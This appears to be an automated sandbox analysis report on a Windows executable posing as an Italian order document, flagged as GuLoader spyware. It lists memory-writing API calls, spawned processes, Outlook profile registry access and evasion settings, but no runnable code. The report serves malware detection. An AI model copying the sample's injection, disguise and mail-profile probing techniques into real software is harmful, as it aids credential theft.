Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227BFB4	2_2_0227BFB4
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_022773B2	2_2_022773B2
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02276BBD	2_2_02276BBD
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02277FB9	2_2_02277FB9
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227C386	2_2_0227C386
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02276F85	2_2_02276F85
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227B785	2_2_0227B785
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227CFE1	2_2_0227CFE1
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02275FF4	2_2_02275FF4
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_022757CF	2_2_022757CF
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_022787CE	2_2_022787CE
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227ABD4	2_2_0227ABD4
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_022763DF	2_2_022763DF
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_022763DD	2_2_022763DD
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02275822	2_2_02275822
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227D02D	2_2_0227D02D
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02277037	2_2_02277037
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02276831	2_2_02276831
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02275802	2_2_02275802
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227C016	2_2_0227C016
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227D06E	2_2_0227D06E
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02278877	2_2_02278877
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227B87F	2_2_0227B87F
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227BC79	2_2_0227BC79
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02276C43	2_2_02276C43
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_022774A5	2_2_022774A5
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227C09D	2_2_0227C09D
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_022770E1	2_2_022770E1
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227B4E9	2_2_0227B4E9
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_022768E9	2_2_022768E9
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02276CF4	2_2_02276CF4
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_022788C6	2_2_022788C6
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_022764C8	2_2_022764C8
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227D0DB	2_2_0227D0DB
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227B927	2_2_0227B927
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227B525	2_2_0227B525
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227B523	2_2_0227B523
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227D12E	2_2_0227D12E
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227C114	2_2_0227C114
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02276D6F	2_2_02276D6F
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02277577	2_2_02277577
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227D171	2_2_0227D171
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02276D7C	2_2_02276D7C
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02276D4E	2_2_02276D4E
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227895F	2_2_0227895F
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227B5A3	2_2_0227B5A3
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_022769AB	2_2_022769AB
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_022725B8	2_2_022725B8
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02278D8E	2_2_02278D8E
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227C192	2_2_0227C192
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227719D	2_2_0227719D
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227B1EB	2_2_0227B1EB
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227D1EB	2_2_0227D1EB
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02276DF2	2_2_02276DF2
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02278DD3	2_2_02278DD3

Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_022782FF NtAllocateVirtualMemory,	2_2_022782FF
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227CB17 NtProtectVirtualMemory,	2_2_0227CB17
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02277625 NtWriteVirtualMemory,	2_2_02277625
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227622C NtWriteVirtualMemory,LoadLibraryA,	2_2_0227622C
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02276A38 NtWriteVirtualMemory,	2_2_02276A38
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227CAAA NtProtectVirtualMemory,	2_2_0227CAAA
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227768F NtWriteVirtualMemory,	2_2_0227768F
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227728D NtWriteVirtualMemory,	2_2_0227728D
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02276AE4 NtWriteVirtualMemory,	2_2_02276AE4
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02276ED6 NtWriteVirtualMemory,	2_2_02276ED6
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02278327 NtAllocateVirtualMemory,	2_2_02278327
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227732E NtWriteVirtualMemory,	2_2_0227732E
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02276770 NtWriteVirtualMemory,	2_2_02276770
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02277754 NtWriteVirtualMemory,	2_2_02277754
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_022773B2 NtWriteVirtualMemory,	2_2_022773B2
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02276BBD NtWriteVirtualMemory,	2_2_02276BBD
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02276F85 NtWriteVirtualMemory,	2_2_02276F85
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_022783C3 NtAllocateVirtualMemory,	2_2_022783C3
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02277037 NtWriteVirtualMemory,	2_2_02277037
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02276831 NtWriteVirtualMemory,	2_2_02276831
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02276C43 NtWriteVirtualMemory,	2_2_02276C43
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_022774A5 NtWriteVirtualMemory,	2_2_022774A5
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02278494 NtAllocateVirtualMemory,	2_2_02278494
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_022770E1 NtWriteVirtualMemory,	2_2_022770E1
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_022768E9 NtWriteVirtualMemory,	2_2_022768E9
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02276CF4 NtWriteVirtualMemory,	2_2_02276CF4
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02276D6F NtWriteVirtualMemory,	2_2_02276D6F
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02277577 NtWriteVirtualMemory,	2_2_02277577
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02276D7C NtWriteVirtualMemory,	2_2_02276D7C
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02276D4E NtWriteVirtualMemory,	2_2_02276D4E
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_022769AB NtWriteVirtualMemory,	2_2_022769AB
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227719D NtWriteVirtualMemory,	2_2_0227719D
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227B1EB NtWriteVirtualMemory,	2_2_0227B1EB
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02276DF2 NtWriteVirtualMemory,	2_2_02276DF2

Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Process Stats: CPU usage > 98%

Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238038485259.0000000000426000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameHYDROCHELIDON.exe vs ORDINE + DDT A.M.F SpA.exe
Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000000.238030340785.0000000000426000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameHYDROCHELIDON.exe vs ORDINE + DDT A.M.F SpA.exe
Source: ORDINE + DDT A.M.F SpA.exe	Binary or memory string: OriginalFilenameHYDROCHELIDON.exe vs ORDINE + DDT A.M.F SpA.exe

Source: ORDINE + DDT A.M.F SpA.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ORDINE + DDT A.M.F SpA.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Section loaded: edgegdi.dll			Jump to behavior

Source: ORDINE + DDT A.M.F SpA.exe

Static PE information: invalid certificate

Source: ORDINE + DDT A.M.F SpA.exe

Virustotal: Detection: 21%

Source: ORDINE + DDT A.M.F SpA.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe "C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe"
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process created: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe "C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe"
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process created: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe "C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe"	Jump to behavior

Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3425316567-2969588382-3778222414-1001\1b1d0082738e9f9011266f86ab9723d2_11389406-0377-47ed-98c7-d564e683c6eb

Jump to behavior

Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

File created: C:\Users\user\AppData\Local\Temp\~DFBA8B24485FEA2BF0.TMP

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/5@3/2

Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Mutant created: \Sessions\1\BaseNamedObjects\28278665D4ACB73EF64D459A

Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.238036448865.0000000000560000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_004078D8 push ds; ret	2_2_004078D9
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_00407B43 push es; ret	2_2_00407B68
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_00409392 push esi; retf	2_2_00409398
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_004083A0 pushad ; ret	2_2_004083A1
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02272A15 push edx; ret	2_2_02272A4C
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02272A4D push edx; ret	2_2_02272A4C
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_022742FC push eax; retn 0010h	2_2_02274835
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02271BFE push ss; ret	2_2_02271E0B
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_022747F8 push eax; retn 0010h	2_2_02274835
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227B4E9 push edx; retn 9253h	2_2_0227DE81
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02271CCE push ss; ret	2_2_02271E0B
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227AD25 push FFFFFFB9h; retf	2_2_0227AD2A
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227AD2D push FFFFFFB9h; retf	2_2_0227AD4C
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02275183 push esp; retf	2_2_02275184
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02271D80 push ss; ret	2_2_02271E0B
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_022729F4 push edx; ret	2_2_02272A4C

Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
